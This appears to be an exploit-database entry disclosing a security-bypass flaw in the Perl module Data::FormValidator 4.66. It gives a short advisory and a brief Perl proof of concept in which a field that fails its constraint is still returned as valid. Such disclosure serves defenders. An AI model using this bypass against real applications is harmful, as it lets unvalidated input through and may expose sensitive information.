header-logo
Suggest Exploit
vendor:
Data::FormValidator
by:
Unknown
N/A
CVSS
N/A
Security Bypass
Unknown
CWE
Product Name: Data::FormValidator
Affected Version From: Data::FormValidator 4.66
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Perl Data::FormValidator Security Bypass Vulnerability

The Perl Data::FormValidator module is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48167/info

The Perl Data::FormValidator module is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.

Data::FormValidator 4.66 is vulnerable; other versions may also be affected.

#!/opt/perl/5.12/bin/perl

use strict;
use warnings;

use Data::FormValidator;

"some_unrelated_string" =~ m/^.*$/;

my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};

my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');